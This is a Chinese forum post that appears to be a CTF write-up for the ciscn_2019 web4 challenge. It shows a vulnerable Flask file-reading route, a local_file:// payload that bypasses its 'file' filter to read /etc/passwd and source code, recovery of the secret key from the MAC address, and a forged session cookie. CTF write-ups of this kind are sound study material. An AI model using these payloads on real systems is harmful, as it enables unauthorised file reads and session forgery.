进入题目页面会提示read something,点击会进入如下链接的页面:
http://xuenixiang.cn/read?url=https://baidu.com
尝试利用url读取文件,使用file:///etc/passwd。
提示no hack。
看着url不像是PHP,因为我好像极少见过PHP用这种路由,直接冒一波险猜他是flask。使用local_file:///etc/passwd读取。
冒险成功。
ciscn_2019_web_southeastern-china-web4
接下来读app/app.py把源码拿下来。
import re, random, uuid, urllib
from flask import Flask, session, request
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
@app.route('/')
def index():
session['username'] = 'www-data'
return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'
@app.route('/read')
def read():
try:
url = request.args.get('url')
m = re.findall('^file.*', url, re.IGNORECASE)
n = re.findall('flag', url, re.IGNORECASE)
if m or n:
return 'No Hack'
res = urllib.urlopen(url)
return res.read()
except Exception as ex:
print str(ex)
return 'no response'
@app.route('/flag')
def flag():
if session and session['username'] == 'fuck':
return open('/flag.txt').read()
else:
return 'Access denied'
if __name__=='__main__':
app.run(
debug=True,
host="0.0.0.0"
)
伪造session需要密钥,正好源码中涉及了。
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
使用的payload为local_file:///sys/class/net/eth0/address
得到Mac地址为:02:42:ae:01:d9:0e。
接下来使用python2求解,因为python3和python2的str保留的位数不一样。
import random
random.seed(0x0242ae01d90e)
print(str(random.random()*233))
接下来使用github的flask-session-manager进行加解密。
首先解密session得到{u'username': 'www-data'},将www-data换成fuck并加密得到:
eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.XonT0Q.wFSm3JOFRrHW-whBsQRIwAn64_0。
访问/flag并修改session得到flag。
ciscn_2019_web_southeastern-china-web4
| 
发表于 2020-5-9 12:54:06
|
查看: 2079|
回复: 0
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜